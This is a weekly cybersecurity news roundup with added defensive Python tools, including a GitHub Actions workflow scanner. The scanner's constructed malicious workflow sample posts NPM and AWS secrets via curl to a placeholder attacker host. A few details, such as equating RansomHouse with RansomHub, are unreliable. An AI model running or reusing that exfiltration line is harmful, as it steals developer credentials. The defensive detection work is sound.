Major Data Breaches and Leaks
Salesloft–Drift Supply Chain Breach – A far-reaching supply chain attack involving Salesloft’s Drift chatbot integration with Salesforce affected hundreds of companies. Threat actors stole OAuth tokens to access Salesforce CRM data at firms like Cloudflare, Palo Alto Networks, Workiva, and others. In many cases, the intruders exfiltrated customer contact info and support case data, then scanned the stolen records for credentials and secrets (API keys, passwords, cloud tokens) to facilitate further intrusions. Impacted organizations rapidly revoked tokens and notified customers; the campaign (attributed to the ShinyHunters group) underscores the danger of third-party integrations becoming weak links.
Plex User Database Breach – Media streaming platform Plex disclosed a breach and urged all users to reset passwords after a hacker accessed a segment of its user database. The stolen data included email addresses, usernames, and hashed passwords (stored following best practices). Plex said no payment information was exposed and that it quickly contained the incident, but it cautioned users to change passwords (and sign out of all devices) out of an abundance of caution. This was Plex’s second such breach in recent years (a similar one occurred in 2022).
Wealthsimple Data Leak – Canadian fintech Wealthsimple reported that attackers stole personal data of under 1% of its 3 million clients in a late-August incident. The breach, detected on August 30, was traced to a compromised third-party software package, not a direct hack of Wealthsimple’s systems. Exposed information included customers’ contact details, government ID scans, financial account numbers, IP addresses, SINs, and dates of birth. Wealthsimple emphasized that no passwords or funds were taken and customer accounts remain secure. Affected individuals are being offered two years of free credit and identity monitoring, and all users were advised to enable 2FA and be alert for phishing attempts using their data.
Lovesac Ransomware Breach – U.S. furniture retailer Lovesac confirmed that it fell victim to a cyberattack earlier this year which exposed personal data of an undisclosed number of individuals. The breach occurred between February 12 and March 3, 2025, when hackers accessed internal systems and stole data (including customers’ full names and other personal information). Lovesac contained the intrusion by March 3 and only disclosed it publicly in September via breach notification letters. Those affected are being offered 24 months of free credit monitoring as a precaution. Notably, the RansomHouse (aka “RansomHub”) ransomware gang had claimed responsibility back in March, suggesting this was part of a double-extortion attack. Lovesac says there is no sign yet that the stolen info has been misused, but recipients of the breach notice were urged to remain vigilant against scams.
Significant Cyberattacks and Incidents
Bridgestone Manufacturing Outage – Tire manufacturing giant Bridgestone Americas suffered a cyberattack that disrupted operations at multiple production plants in the U.S. (South Carolina) and Canada (Quebec). The company responded by rapidly isolating systems, which it believes contained the attack before extensive damage occurred. Bridgestone reported no evidence of customer data theft or broader network compromise, although it temporarily halted some factory workflows. By week’s end, teams were working 24/7 to restore normal production and mitigate any supply chain delays. (In an unrelated incident in 2022, Bridgestone was hit by a LockBit ransomware attack, so the company was on high alert this time.) Bridgestone has not confirmed the nature of the latest attack, and no ransomware group has claimed credit as of yet.
Jaguar Land Rover Shutdown – Automaker Jaguar Land Rover (JLR) announced that a cyberattack over the weekend severely disrupted its vehicle production and IT systems. In response, JLR proactively shut down certain systems to contain the threat. The incident forced some manufacturing at the Solihull plant (UK) offline and impacted retail operations, though JLR stated it had no evidence that any customer data was stolen. By mid-week, the company was slowly restarting applications in a controlled manner and working to get factories back online. This attack follows warnings from law enforcement about ongoing cybercrime campaigns targeting the aviation and automotive industries (notably by the Scattered Spider group). Indeed, a hacker group affiliated with ShinyHunters claimed responsibility for the JLR breach, suggesting they exploited third-party systems connected to Salesforce and other services.
Widely-Used npm Packages Hijacked – In a major software supply chain incident, attackers compromised an npm maintainer’s account via a phishing email and then pushed malicious updates to at least 18 popular JavaScript packages (collectively downloaded ~2.6 billion times weekly). The affected libraries – including core utils like debug, chalk, color-string, and ansi-regex – were modified with malware that intercepts web traffic in applications that use these packages. Specifically, the malicious code hooks into web APIs and monitors cryptocurrency wallet addresses; if a crypto transaction is detected, it can silently redirect payments to attacker-controlled wallets, hijacking funds in transit. The window of compromise was brief (the rogue package versions were live for only a few hours on September 8 before npm security removed them), and only users who installed or updated those packages during that time would be infected. Nonetheless, this attack highlights the ongoing risk of open-source repository exploits. Developers are advised to review dependencies, rotate any credentials that may have been exposed, and implement 2FA on package accounts. (This incident is reminiscent of earlier npm compromises in March and July, showing adversaries’ continued focus on the open-source supply chain.)
“GhostAction” Steals Dev Secrets – Another software supply chain campaign, dubbed GhostAction, was uncovered on GitHub. Threat actors hijacked GitHub repositories by adding malicious GitHub Actions workflow files to at least 817 open-source projects. Once these workflows ran (triggered via a push or manual trigger), they read dozens of secret environment variables (like cloud keys, npm/PyPI tokens, Docker credentials) and exfiltrated them via a rogue HTTP POST to the attackers’ server. Over 3,300 sensitive secrets were stolen in this manner before GitGuardian researchers exposed the operation. CI logs indicate the attackers enumerated common secret names across various languages and frameworks to maximize data theft. The campaign was active through early September; upon discovery, GitHub and package registries were alerted and many project owners quickly removed the malicious files. Developers are urged to check their repos for unexpected GitHub Action changes and rotate any leaked credentials. The GhostAction attack (which is distinct from the npm incident above) underscores the need for vigilant monitoring of build pipelines and the principle of least privilege for CI/CD credentials.
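To act on the advice to review dependencies after the npm hijack, here is an added example (not from the original article or from the npm project) in Python that walks a package-lock.json, including packages nested under other packages, and reports every occurrence of the libraries named above. The malicious version numbers are not given on the page, so KNOWN_BAD_VERSIONS holds a labelled placeholder to be filled from the advisory, and the sample lockfile is constructed.

```python
import json
from typing import Dict, List, Set, Tuple

# Package names the page lists among the hijacked libraries.
AFFECTED_PACKAGES = {"debug", "chalk", "color-string", "ansi-regex"}

# CONSTRUCTED PLACEHOLDER: the page does not give the malicious version numbers.
# Fill this from the npm/GitHub advisory before running a real audit.
KNOWN_BAD_VERSIONS: Dict[str, Set[str]] = {
    "chalk": {"0.0.0-placeholder"},
    "debug": {"0.0.0-placeholder"},
}


def package_name_from_path(path: str) -> str:
    """Map a lockfile 'packages' key to a package name.

    Keys look like 'node_modules/chalk' or
    'node_modules/express/node_modules/@scope/pkg'; the name is everything
    after the last 'node_modules/' segment, so scoped names keep '@scope/'.
    The root project entry has the key '' and yields ''.
    """
    marker = "node_modules/"
    idx = path.rfind(marker)
    return "" if idx == -1 else path[idx + len(marker):]


def audit_lockfile(lock: dict) -> List[Tuple[str, str, str]]:
    """Return (name, version, status) for every watched package, nested copies included."""
    if lock.get("lockfileVersion", 0) < 2 or "packages" not in lock:
        raise ValueError("expected a lockfileVersion 2 or 3 package-lock.json")
    findings = []
    for path, meta in lock["packages"].items():
        name = package_name_from_path(path)
        if name not in AFFECTED_PACKAGES:
            continue
        version = meta.get("version", "?")
        if version in KNOWN_BAD_VERSIONS.get(name, set()):
            status = "MALICIOUS VERSION: reinstall a clean version and rotate exposed credentials"
        else:
            status = "watched package present: confirm the version against the advisory"
        findings.append((name, version, status))
    return sorted(findings)


def audit_lockfile_path(path: str) -> List[Tuple[str, str, str]]:
    """Convenience wrapper: audit a package-lock.json on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_lockfile(json.load(fh))


# Constructed sample lockfile: a direct chalk dependency pinned to the placeholder
# bad version, plus a legitimate debug nested under express.
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"chalk": "^5.0.0", "express": "^4.19.0"}},
        "node_modules/chalk": {"version": "0.0.0-placeholder"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/express/node_modules/debug": {"version": "2.6.9"},
        "node_modules/@types/node": {"version": "20.11.0"},
    },
}

if __name__ == "__main__":
    for name, version, status in audit_lockfile(SAMPLE_LOCK):
        print(f"{name}@{version}: {status}")
```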
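As an added example (not GitGuardian's or GitHub's tooling), the following Python scanner applies the GhostAction pattern described above to a workflow file's raw YAML: it collects the distinct ${{ secrets.* }} references, flags a workflow that serialises the whole secrets context, and looks for a command-line HTTP client pointed at a host outside a small allowlist. Both workflow samples are constructed and attacker.example is a placeholder host.

```python
import re
from dataclasses import dataclass, field
from typing import List

# ${{ secrets.NAME }} references anywhere in the workflow (env:, with:, run:).
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")
# Serialising the whole secrets context hands every secret to a single step.
ALL_SECRETS = re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE)
# Command-line HTTP clients followed by a URL on the same line of a run: step.
HTTP_CLIENT = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|Invoke-RestMethod)\b[^\n]*?(https?://[^\s'\"]+)"
)
# Hosts a release workflow legitimately talks to; anything else is reported.
ALLOWED_HOSTS = ("github.com", "api.github.com", "registry.npmjs.org", "upload.pypi.org")


@dataclass
class Finding:
    severity: str
    reason: str
    secrets: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)


def host_of(url: str) -> str:
    """Lower-cased host of an http(s) URL, with userinfo and port stripped."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    return authority.rsplit("@", 1)[-1].split(":", 1)[0].lower()


def is_allowed_host(host: str) -> bool:
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)


def scan_workflow(text: str, secret_threshold: int = 5) -> List[Finding]:
    """Score one workflow file's raw YAML text for GhostAction-style secret exfiltration."""
    secrets = sorted(set(SECRET_REF.findall(text)))
    external_urls = [m.group(2) for m in HTTP_CLIENT.finditer(text)
                     if not is_allowed_host(host_of(m.group(2)))]
    findings: List[Finding] = []
    if ALL_SECRETS.search(text):
        findings.append(Finding("high", "workflow serialises the entire secrets context"))
    if secrets and external_urls:
        findings.append(Finding(
            "high", "secrets referenced in the same workflow as an HTTP call to a non-allowlisted host",
            secrets, external_urls))
    elif len(secrets) >= secret_threshold:
        findings.append(Finding(
            "medium", f"{len(secrets)} distinct secrets referenced in one workflow", secrets))
    elif external_urls:
        findings.append(Finding("low", "HTTP call to a non-allowlisted host", urls=external_urls))
    return findings


# Constructed sample: a normal publish workflow that only talks to npm and GitHub.
BENIGN_WORKFLOW = """\
name: publish
on: { push: { tags: ['v*'] } }
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
      - run: curl -sf https://api.github.com/repos/${{ github.repository }}/releases
"""

# Constructed sample modelled on the page's description: many secrets pulled into
# env and posted to an attacker host (placeholder domain) from a run: step.
MALICIOUS_WORKFLOW = """\
name: ci
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -X POST -d "npm=$NPM_TOKEN&aws=$AWS_SECRET_ACCESS_KEY" https://attacker.example/collect
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
          AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("malicious", MALICIOUS_WORKFLOW)):
        print(label, scan_workflow(wf) or "no findings")
```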
iCloud Phishing via Apple Servers – A crafty phishing campaign emerged in which scammers abused Apple’s iCloud Calendar invite feature to send emails that appeared to come legitimately from Apple’s own email domain. In one reported case, victims received an email from noreply@email.apple.com (passing all SPF/DKIM/DMARC checks) falsely claiming a $599 PayPal charge and providing a phone number to “dispute” the charge. The email was actually an iCloud calendar invite crafted with the scam text in the event notes; by inviting external email addresses (often Microsoft 365 accounts that forward to many users), the scammers caused Apple’s servers to send the phony notification, helping it bypass spam filters. Unsuspecting recipients who called the provided number were connected to fraudsters posing as support reps, who then attempted typical “callback scam” tricks (remote access to PC, refund hustles, etc). Security experts note this technique takes advantage of trusted cloud services to lend credibility to scams. Users should be wary of unexpected calendar invites or emails about payments — legitimate companies rarely include support phone numbers in unsolicited billing emails. Apple has been informed, though no official fix was announced yet; in the meantime, users can disable auto-add of calendar invites and report such phishing attempts.
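As an added example (not from the original article or from Apple), this Python mail-filter heuristic parses an inbound calendar invite and flags the pattern just described: billing language, a dollar amount and a callback phone number in the event notes of a message that arrives through a trusted notifier domain, so that sender authentication alone cannot catch it. Both sample messages are constructed, and the 555 phone number is fictional.

```python
import email
import email.utils
import re
from typing import Dict, List

PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
AMOUNT_RE = re.compile(r"(?:\$|usd\s?)\d{1,5}(?:\.\d{2})?")
BILLING_WORDS = ("charge", "invoice", "payment", "paypal", "refund", "dispute", "subscription")
# Domains Apple's own calendar notifications come from (the page names email.apple.com).
TRUSTED_NOTIFIER_DOMAINS = ("email.apple.com", "icloud.com")


def unfold_ics(text: str) -> List[str]:
    """Join RFC 5545 folded lines: a continuation line starts with a space or tab."""
    lines: List[str] = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def ics_property(lines: List[str], name: str) -> str:
    """Value of the first property called `name` (any ;PARAMS ignored), escapes restored."""
    for line in lines:
        key, _, value = line.partition(":")
        if key.split(";", 1)[0].upper() == name:
            return value.replace("\\n", "\n").replace("\\,", ",")
    return ""


def analyse_invite(raw_message: str) -> Dict[str, object]:
    """Flag a calendar-invite e-mail whose event text reads like a billing callback scam."""
    msg = email.message_from_string(raw_message)
    sender_domain = email.utils.parseaddr(msg.get("From", ""))[1].rsplit("@", 1)[-1].lower()
    calendar_text = ""
    for part in msg.walk():  # the invite travels as a text/calendar MIME part
        if part.get_content_type() == "text/calendar":
            payload = part.get_payload(decode=True) or b""
            calendar_text = payload.decode(part.get_content_charset() or "utf-8", "replace")
            break
    if not calendar_text:
        return {"is_invite": False, "suspicious": False, "via_trusted_notifier": False, "reasons": []}
    lines = unfold_ics(calendar_text)
    text = (ics_property(lines, "SUMMARY") + " " + ics_property(lines, "DESCRIPTION")).lower()
    has_phone = bool(PHONE_RE.search(text))
    has_amount = bool(AMOUNT_RE.search(text))
    has_billing = any(word in text for word in BILLING_WORDS)
    via_trusted = any(sender_domain == d or sender_domain.endswith("." + d)
                      for d in TRUSTED_NOTIFIER_DOMAINS)
    reasons = [label for flag, label in ((has_phone, "phone number in event text"),
                                         (has_amount, "currency amount in event text"),
                                         (has_billing, "billing language in event text")) if flag]
    if via_trusted and reasons:
        reasons.append("relayed by a trusted notifier, so SPF/DKIM/DMARC pass by design")
    # A callback number next to money talk is the scam's signature; either alone is common.
    return {"is_invite": True, "suspicious": has_phone and (has_amount or has_billing),
            "via_trusted_notifier": via_trusted, "reasons": reasons}


# Constructed sample modelled on the page: relayed by Apple's notifier, scam text in the notes.
SCAM_INVITE = """\
From: iCloud <noreply@email.apple.com>
Subject: Invitation: PayPal charge
Content-Type: text/calendar; charset="utf-8"; method=REQUEST

BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:constructed-sample-1
ORGANIZER:mailto:billing-desk@example.net
SUMMARY:PayPal charge of $599.00
DESCRIPTION:A charge of $599.00 was made to your PayPal account. If you did
  not authorize this\\, call 1-800-555-0199 to dispute it.
END:VEVENT
END:VCALENDAR
"""

# Constructed benign invite for comparison.
BENIGN_INVITE = """\
From: Alice <alice@example.com>
Subject: Invitation: Sprint review
Content-Type: text/calendar; charset="utf-8"; method=REQUEST

BEGIN:VCALENDAR
BEGIN:VEVENT
SUMMARY:Sprint review
DESCRIPTION:Demo of the new login flow\\, then retro.
END:VEVENT
END:VCALENDAR
"""
```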
Critical Vulnerabilities and Patches
Sitecore CRM Zero-Day (CVE-2025-53690) – A critical deserialization vulnerability in Sitecore Experience Platform (a popular web CMS/CRM) is being actively exploited in the wild. The flaw (CVSS 9.0) stems from a default machine key left in older Sitecore installations, which attackers use to forge malicious ViewState data and achieve remote code execution on the server. Mandiant investigators disclosed that attackers leveraged this bug to drop malware and create admin accounts in at least one incident. CISA has added CVE-2025-53690 to its Known Exploited Vulnerabilities catalog and ordered U.S. federal agencies to patch by September 25. Sitecore released fixes and urged customers to rotate any “sample” keys, audit for suspicious activity, and update immediately. Given the bug’s ease of exploitation (static keys are widely known) and the privileged access it grants, organizations running Sitecore should treat this as a top priority.
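The page describes attackers forging ViewState with a default machine key. As an added example (not Sitecore's or Mandiant's tooling), this Python script audits a web.config for a static machineKey that matches a placeholder sample-key set (the page does not reproduce the real sample key, so KNOWN_SAMPLE_KEYS must be filled from the advisory), flags legacy algorithms or a disabled ViewState MAC, and generates a fresh random replacement element. The sample web.config is constructed.

```python
import secrets
import xml.etree.ElementTree as ET
from typing import List

# CONSTRUCTED PLACEHOLDER: the page does not reproduce the sample key itself.
# Populate with the sample values from the vendor advisory before a real audit.
KNOWN_SAMPLE_KEYS = {"DEADBEEF" * 16, "DEADBEEF" * 8}

WEAK_VALIDATION = {"MD5", "SHA1"}
WEAK_DECRYPTION = {"DES", "3DES"}


def audit_machine_key(web_config_xml: str) -> List[str]:
    """Return findings about the <machineKey> (and ViewState MAC setting) in a web.config."""
    root = ET.fromstring(web_config_xml)
    findings: List[str] = []
    mk = root.find("./system.web/machineKey")
    if mk is None:
        return ["no explicit <machineKey>: keys are auto-generated per server"]
    # "AutoGenerate,IsolateApps" is ASP.NET's default when an attribute is absent.
    for label in ("validationKey", "decryptionKey"):
        key = mk.get(label, "AutoGenerate,IsolateApps")
        if key.startswith("AutoGenerate"):
            continue
        if key.upper() in KNOWN_SAMPLE_KEYS:
            findings.append(f"{label} matches a published sample key: rotate immediately")
        elif label == "validationKey" and len(key) < 64:
            findings.append(f"validationKey is only {len(key)} hex chars; prefer 64 bytes")
    if mk.get("validation", "").upper() in WEAK_VALIDATION:
        findings.append(f"validation={mk.get('validation')} is a legacy algorithm")
    if mk.get("decryption", "").upper() in WEAK_DECRYPTION:
        findings.append(f"decryption={mk.get('decryption')} is a legacy algorithm")
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState is accepted without any MAC check")
    return findings


def new_machine_key_element() -> str:
    """Build a replacement <machineKey> with fresh random keys (HMACSHA256 + AES-256)."""
    validation_key = secrets.token_hex(64).upper()  # 64 bytes -> 128 hex chars
    decryption_key = secrets.token_hex(32).upper()  # 32 bytes -> 64 hex chars
    return (f'<machineKey validationKey="{validation_key}" '
            f'decryptionKey="{decryption_key}" '
            'validation="HMACSHA256" decryption="AES" />')


# Constructed sample web.config: static keys copied from the placeholder sample set.
SAMPLE_WEB_CONFIG = f"""\
<configuration>
  <system.web>
    <machineKey validationKey="{'DEADBEEF' * 16}"
                decryptionKey="{'DEADBEEF' * 8}"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""

if __name__ == "__main__":
    for finding in audit_machine_key(SAMPLE_WEB_CONFIG):
        print("-", finding)
    print("replacement:", new_machine_key_element())
```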
SAP S/4HANA Code Injection (CVE-2025-42957) – SAP admins are racing to patch a critical code injection flaw in SAP S/4HANA ERP software after reports that attackers are now exploiting it in real attacks. CVE-2025-42957 (CVSS 9.9) allows low-privileged users to execute arbitrary ABAP code, potentially leading to full takeover of the SAP application and underlying host. SAP released a patch for this in August’s update, but this week security firm SecurityBridge confirmed multiple exploit instances in the wild. The vulnerability is considered low complexity to weaponize – skilled malicious insiders or hackers with minimal access could leverage it to, for example, create new admin accounts, delete or alter financial records, steal password hashes, or even deploy ransomware on SAP systems. While exploitation so far appears limited (targeted attacks), all SAP S/4HANA customers are strongly advised to apply the available patch and examine logs for any anomalous user creation or remote function calls. This case highlights that even enterprise applications are prime targets for attackers once a critical bug becomes public.
Android Zero-Days Patched – Google’s September 2025 Android updates included fixes for 120 vulnerabilities, among them two critical flaws already under active exploit. The first, CVE-2025-38352, is a Linux Kernel privilege escalation bug that can allow a local app (or chained exploit) to gain root-level access; the second, CVE-2025-48543, is a privilege escalation in the Android Runtime. Google’s Threat Analysis Group discovered these being used in targeted attacks (likely as part of spyware campaigns). Users of Pixel and other Google-supported devices received patches immediately, while OEMs like Samsung and Xiaomi incorporated them in their security updates. Given the history of Android zero-days being used to install spyware on high-profile targets, it’s crucial for Android users to install the latest security patch (September 2025 or later) on their devices. These exploits underscore the importance of keeping mobile OSes updated, as attackers continue to actively target mobile platforms.
Data Center & IoT Warnings – Other notable vulnerabilities disclosed or patched this week include: a high-severity bug in SAP 3D Visual Enterprise License Manager (CVE-2025-52856) and two RCE flaws in QNAP QVR video surveillance systems, all patched in vendor updates. Meanwhile, security researchers warned of a newly found flaw in Next.js (CVE-2025-29927) that could enable server-side code execution in certain configurations – developers are urged to update to the latest Next.js release. Finally, Cisco users were alerted to unusual scanning activity (25,000+ IPs) targeting Cisco ASA VPN/Firewall devices. While no new ASA exploit is confirmed, such scanning often precedes the disclosure of a zero-day, so administrators should ensure their ASA appliances are fully patched and monitor for any attempted logins or config changes.
(The above highlights underscore the relentless pace of vulnerability discovery. Defenders should prioritize patches for any critical CVEs, especially those known to be exploited, and follow guidance from vendors and agencies like CISA.)
Government and Industry Cyber Responses
Texas Sues Over Mass School Breach – The Texas Attorney General filed a lawsuit against education software provider PowerSchool in response to a massive 2024 data breach. The breach, disclosed by PowerSchool in January, involved a compromise of its K-12 student information system that exposed records of 62 million students and 9.5 million staff across 6,505 school districts (including ~880,000 Texans). Attackers had stolen a subcontractor’s credentials and downloaded sensitive student data (names, addresses, Social Security numbers, medical and academic info); they later demanded a $2.85 million ransom and leaked the data when unpaid. Texas alleges PowerSchool’s security failures violated state consumer protection and data protection laws. The suit seeks financial penalties and improved security practices. This legal action by Texas – one of the largest data-breach-related suits in the education sector – signals that state governments are increasingly ready to hold companies accountable for failing to safeguard personal data, especially when children are involved.
U.S. Sanctions SE Asian Scam Networks – The U.S. government announced new sanctions targeting cybercrime rings in Southeast Asia running large-scale scam operations. The U.S. Treasury’s Office of Foreign Assets Control (OFAC) sanctioned nine individuals and twelve entities tied to so-called “scam compounds” in Myanmar and Cambodia. These criminal enterprises (often masquerading as casinos or call centers) are accused of conducting industrial-scale online fraud – including romance-investment scams and crypto schemes – that have defrauded victims worldwide of over $10 billion. Notably, the sanctioned parties include Burmese militia leaders and Chinese businessmen who facilitate forced-labor scam centers where trafficking victims are made to perpetrate scams under coercion. U.S. officials stated that the sanctions, which freeze U.S.-linked assets and bar transactions with the designated persons, aim to disrupt these networks’ finances and protect potential victims in the U.S. and elsewhere. This move follows several rounds of sanctions earlier in 2025 against similar operations, reflecting a growing international effort to crack down on transnational cyber-fraud and human trafficking rings.
Qantas Execs Penalized Post-Breach – In an example of corporate accountability, Australian airline Qantas revealed that it cut annual bonuses for top executives by 15% this year as a consequence of a major cyberattack. In its earnings report, Qantas noted the July 2025 breach (by the Scattered Spider group) that exposed personal data of 5.7 million customers had a serious impact on the company. While Qantas’ management quickly contained the incident and enhanced security afterward, the Board’s chairman stated that leadership must “share accountability” for the failure. The bonus reduction translates to about $250,000 less pay for the CEO and proportional cuts for other executives. Qantas’ response stands out as an industry precedent – effectively imposing financial penalties on management for cybersecurity lapses. The company has since incorporated lessons from the attack into its risk management framework. This development sends a message that C-suites and boards are treating cyber incidents not just as IT issues but as organizational failures with real business consequences.
Record Privacy Fines in France – France’s data protection regulator, CNIL, issued record-setting GDPR fines this week over illegal tracking practices. Google was fined €325 million (≈$379M) and Shein (a Chinese e-commerce retailer) €150 million (≈$175M) for violating cookie consent laws. CNIL found that both companies were placing advertising cookies on users’ devices without obtaining valid consent. In Google’s case, the investigation highlighted that until late 2023, creating a Google account pushed users to accept personalized ads cookies by default, without clearly offering an opt-out – which CNIL ruled a breach of French law. Shein similarly was caught dropping trackers before consent. Shein has since adjusted its cookie consent mechanism and announced plans to appeal the fine. Google has been given 6 months to comply with French requirements or face additional penalties of €100K per day. These fines (among the largest ever under GDPR) underscore the continued regulatory focus on Big Tech’s data practices. Companies operating in the EU must ensure strict adherence to consent rules for cookies and tracking, as regulators show willingness to levy nine-figure penalties. (In a related note, a U.S. jury separately ordered Google to pay $425 million in a class-action privacy lawsuit this week, indicating global momentum in privacy enforcement.)
Miscellaneous
New APT28 “NotDoor” Backdoor – Russian state-backed hackers (APT28, linked to GRU) have been deploying a stealthy new backdoor for Microsoft Outlook, dubbed “NotDoor” (aka GONEPOSTAL). This malware comes as a malicious VBA macro embedded in Outlook rules, and is designed to await a trigger word via incoming email. Once the trigger email arrives, NotDoor allows the attackers to remotely exfiltrate emails and files, upload malware, and execute commands on the infected system – effectively turning the victim’s Outlook into a persistence mechanism. According to S2 Grupo’s LAB52, APT28 used NotDoor in targeted attacks against government and defense-related organizations in multiple NATO countries. The discovery of NotDoor is a reminder that advanced threat actors continue to innovate with email-based backdoors that can bypass many endpoint defenses. Organizations should harden their Outlook security (e.g. disable or restrict VBA macros in Office applications via Group Policy) and monitor for suspicious email rule creation, especially in high-value accounts.
AI in Malware and Defense – The intersection of AI and cybersecurity was highlighted by two developments: First, researchers unveiled an unusual malware called “AI Waifu RAT”, a Windows remote access trojan that actually embeds a local large-language model (AI assistant) to help process attacker commands. The RAT’s creators appear to use the AI to interpret and execute natural-language instructions (passed through a web UI) on the victim’s machine, effectively giving the malware a pseudo-“smart” controller. This experimental threat shows how generative AI can be misused to make malware more flexible or automated. Meanwhile, in a twist, security analysts noted that threat actors are attempting to weaponize a recently released defensive AI tool called HexStrike AI. HexStrike was meant to help automate penetration testing and find vulnerabilities, but attackers claim to have repurposed it into an exploitation engine to rapidly exploit newly disclosed flaws. This dual-use problem – where AI tools for defense can be turned to offense – underscores a growing reality: AI will be leveraged by both sides. Security teams may need to invest in AI-driven detection and response, while also preparing for malware and attacks that have AI components.
“GhostRedirector” SEO Fraud Scheme – ESET researchers profiled a new threat cluster called GhostRedirector, which has compromised at least 65 servers across Asia and South America for an SEO fraud-as-a-service operation. The attackers deploy a lightweight C++ backdoor dubbed “Rungan” along with a malicious IIS web server module named “Gamshen” on Windows servers they breach. Gamshen intercepts web traffic on those servers to stealthily manipulate search engine results, inserting or boosting the ranking of the attackers’ clients’ websites in search queries. In essence, the hacked servers are used as unwitting SEO booster nodes to fraudulently inflate the prominence of certain sites (likely for shady online businesses or scams). The GhostRedirector group has been active since at least 2024, and its model shows an evolution in cybercriminal monetization: beyond data theft or ransomware, infected infrastructure is being rented out for illicit SEO and click-fraud services. Organizations running self-hosted web servers should ensure they are patched and monitor for any unknown IIS modules or unusual outbound connections, as these can be indicators of such compromise.
Password Cracking on the Rise – A new industry report this week (the Picus “Blue Report 2025”) revealed a troubling trend: significantly more enterprise environments are succumbing to password cracking during security assessments. According to the report, 46% of tested environments had at least one password cracked, nearly double the 25% of environments observed last year. The cracked credentials often enable deeper penetration during red-team exercises, simulating how real attackers move laterally. Common issues include weak or reused passwords and inadequate password hash protection. This trend highlights the importance of organizations enforcing stronger password policies (length and complexity), eliminating default credentials, and implementing multi-factor authentication everywhere possible. It also suggests that attackers’ capabilities in cracking hashes (via improved GPU rigs or leaked password lists) are growing – making it imperative for defenders to reduce reliance on password-only security.
Cyber Conferences and Collaborations – The first week of September also saw several notable gatherings and initiatives in the cybersecurity community. In Washington, the annual Cybersecurity Summit hosted by US government agencies and private sector partners focused on improving public-private info-sharing and announced an expanded Joint Ransomware Task Force to coordinate responses to ransomware attacks globally. Separately, leading cybersecurity companies (including CrowdStrike, Mandiant, and Microsoft) disclosed a new collaborative effort to share real-time threat intelligence on critical infrastructure attacks. And in industry news, venture investments in cybersecurity startups remain robust – Cybersecurity Ventures reported that despite economic headwinds, global cyber startups raised over $2.5 billion in Q3 2025, targeting areas like AI-driven security, cloud data protection, and OT security. These developments demonstrate an ongoing emphasis on collective defense: from big conferences to threat intel sharing alliances, stakeholders are leaning into collaboration and innovation to keep pace with evolving threats.
Conclusion
Third-Party Risk is Paramount – This week’s breaches (Salesloft/Drift OAuth tokens, 3rd-party software at Wealthsimple, etc.) reinforce that supply chain and vendor-integrated attacks are now a top risk. Organizations must rigorously vet the security of SaaS providers and APIs, limit the data and permissions given to integrations, and have monitoring in place to detect unusual access via partner systems. In essence, trust but verify your supply chain: a weak link can expose hundreds of others.
Patch Urgently, Patch Often – The flurry of zero-days and exploited vulnerabilities (in Sitecore, Android, SAP, and others) is a stark reminder that keeping systems updated is not optional. Businesses should ensure they can deploy critical patches within days (if not hours) of release and consider virtual patching or workarounds when immediate updates aren’t possible. A single unpatched internet-facing server or device can open the door to a major incident – as evidenced by the Sitecore exploits. A robust vulnerability management program, coupled with threat intelligence on active exploits, is vital for risk reduction.
Stay Vigilant Against Sophisticated Phishing – From cleverly spoofed Apple emails to targeted spear-phishing of developers (npm maintainer) and diplomats (Homeland Justice campaign), social engineering remains extremely potent. Users at all levels need regular awareness training to spot new scam techniques. Technical controls can help (e.g. email authentication, attachment sandboxing), but human vigilance is often the last line of defense. This week showed that attackers will abuse even trusted services (like iCloud or GitHub) to get past filters – cultivating a skeptical, verify-before-trusting mindset among employees and customers is as important as ever.
Accountability and Enforcement are Growing – We’re seeing a global trend of greater accountability for cybersecurity. Governments are stepping in – whether through lawsuits (as in Texas vs PowerSchool), regulatory fines (CNIL’s record penalties), or sanctions (against scam networks) – to incentivize better security practices and punish negligence or malice. Likewise, companies like Qantas are holding their own leadership accountable when failures occur. The implications are clear: organizations that handle sensitive data are expected to uphold high security standards or face legal, financial, and reputational consequences. Cybersecurity is not just an IT issue, but a governance and business continuity issue that demands attention from the C-suite and board.
Adapting to the AI-Driven Future – The emergence of AI in both cyber offense and defense highlights a new frontier. Security teams should prepare for threats that leverage AI – whether it’s malware with pseudo-intelligence, automated hacking tools, or deepfake-driven social engineering – and simultaneously capitalize on AI for defense (to triage alerts, detect anomalies, etc.). The playing field is shifting quickly: those who adapt and incorporate AI ethically into their security operations will have an edge, while those who ignore it may find themselves outpaced by AI-augmented attackers. The key takeaway is to embrace innovation while remaining wary of its misuse.
